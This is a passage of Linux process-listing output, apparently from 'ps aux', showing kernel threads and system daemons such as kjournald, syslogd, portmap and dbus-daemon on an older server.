root 11 0.0 0.0 0 0 ? S< Jun07 0:00 [kacpid]
root 71 0.0 0.0 0 0 ? S< Jun07 0:00 [cqueue/0]
root 74 0.0 0.0 0 0 ? S< Jun07 0:00 [khubd]
root 76 0.0 0.0 0 0 ? S< Jun07 0:00 [kseriod]
root 129 0.0 0.0 0 0 ? S Jun07 0:00 [pdflush]
root 130 0.0 0.0 0 0 ? S Jun07 0:00 [pdflush]
root 131 0.0 0.0 0 0 ? S< Jun07 0:00 [kswapd0]
root 132 0.0 0.0 0 0 ? S< Jun07 0:00 [aio/0]
root 285 0.0 0.0 0 0 ? S< Jun07 0:00 [kpsmoused]
root 302 0.0 0.0 0 0 ? S< Jun07 0:01 [kjournald]
root 327 0.0 0.0 0 0 ? S< Jun07 0:00 [kauditd]
root 353 0.0 0.5 2904 1368 ? S<s Jun07 0:01 /sbin/udevd -d
root 1191 0.0 0.0 0 0 ? S< Jun07 0:00 [kmpathd/0]
root 1197 0.0 0.0 0 0 ? S< Jun07 0:00 [kmirrord]
root 1218 0.0 0.0 0 0 ? S< Jun07 0:00 [kjournald]
root 1220 0.0 0.0 0 0 ? S< Jun07 0:00 [kjournald]
root 1663 0.0 2.7 8260 6908 ? Ss Jun07 0:00 /usr/sbin/resto
root 1672 0.0 0.2 1692 576 ? Ss Jun07 0:01 syslogd -m 0
root 1675 0.0 0.1 1640 396 ? Ss Jun07 0:00 klogd -x
root 1698 0.0 0.1 2124 388 ? Ss Jun07 0:00 mcstransd
rpc 1710 0.0 0.2 1776 552 ? Ss Jun07 0:00 portmap
root 1729 0.0 0.3 1888 804 ? Ss Jun07 0:00 rpc.statd
root 1758 0.0 0.2 4932 560 ? Ss Jun07 0:00 rpc.idmapd
dbus 1772 0.0 0.4 13384 1148 ? Ssl Jun07 0:01 dbus-daemon --s
root 1782 0.0 0.3 2348 868 ? Ss Jun07 0:00 hcid: processin
root 1794 0.0 0.1 1708 492 ? 
